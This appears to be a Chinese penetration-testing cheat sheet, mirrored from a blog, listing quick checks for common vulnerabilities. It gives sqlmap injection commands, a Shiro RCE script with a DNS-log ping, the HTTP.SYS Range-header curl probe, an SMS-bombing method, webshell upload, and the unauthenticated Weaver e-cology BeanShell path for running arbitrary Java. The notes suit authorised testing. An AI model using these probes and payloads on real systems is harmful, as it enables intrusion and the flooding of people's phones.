zoukankan      html  css  js  c++  java
  • 常见漏洞简单测试整理

    Shiro反序列化漏洞

    特征:Apache Shiro <= 1.2.4
    工具:shiro_rce.py+http://www.dnslog.cn/
    验证:python .shiro_rce.py URL "ping DNS"

    STRUTS2 远程命令执行

    特征:网站使用JAVA编程 URL中包含.action .do
    工具:struts2全版本漏洞查询工具.jar(图像化)

    POST注入:

    特征:WEB页面与数据库交互的地方,抓取POST的包。
    工具:sqlmap.py
    验证:python2 .sqlmap -r 文件 --batch --random-agent --level 2

    GET注入:

    工具:sqlmap.py
    验证:python2 .sqlmap -u URL --forms
    python2 .sqlmap.py -u URL --batch --level 3

    短信DDOS

    特征:使用手机号注册需要验证码。
    工具:BurpLoader
    验证:通过抓取发生验证包对手机号不断发包,没有次数限制。

    HTTP.SYS远程代码执行漏洞

    特征:WEB使用Windows服务器。
    工具:CURL
    验证:curl -v URL -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

    POODLE 漏洞

    特征:开放443端口
    工具:NMAP
    验证:nmap --script ssl-poodle -sV -p 443 IP地址

    Windows远程桌面服务漏洞

    特征:Windows7及一下,开发远程端口,默认3389
    工具:0708Detector_v2_x64.exe
    验证:.708Detector_v2_x64.exe -t IP -P 3389

    验证码泄露:

    特征:在获取验证的码的数据包中可以看到验证码,或者通过发生获取验证包的返回包中包含验证码。

    任意用户注册:

    特征:不需要获取手机号或邮箱的验证码

    文件上传:

    特征:存在上传图片或上传附件的地方,上传webshell。

    泛微 e-cology OA 远程代码执行

    特征:漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,也就是说可以执行任意命令版本包括但不限于7.0,8.0,8.1
    验证:直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/
    访问后直接在 Script 处输入Java代码点击 Evaluate 即可触发漏洞,并可以在Script Output处看到回显

  • 相关阅读:
    利用NPOI导出数据到Execl
    分享微信开发Html5轻游戏中的几个坑
    Integrate non-OSGi Dependencies
    Websocket Component
    ServiceMix in daemon mode
    springboot jwt配置(更新中)
    npm run build 后的dist文件,发布到web服务。
    不重复随机数列的生成算法 Leetcode 384. Shuffle an Array
    LSM树-HBASE为什么快
    混沌工程初探
  • 原文地址:https://www.cnblogs.com/wjlyn/p/11640273.html
Copyright © 2011-2022 走看看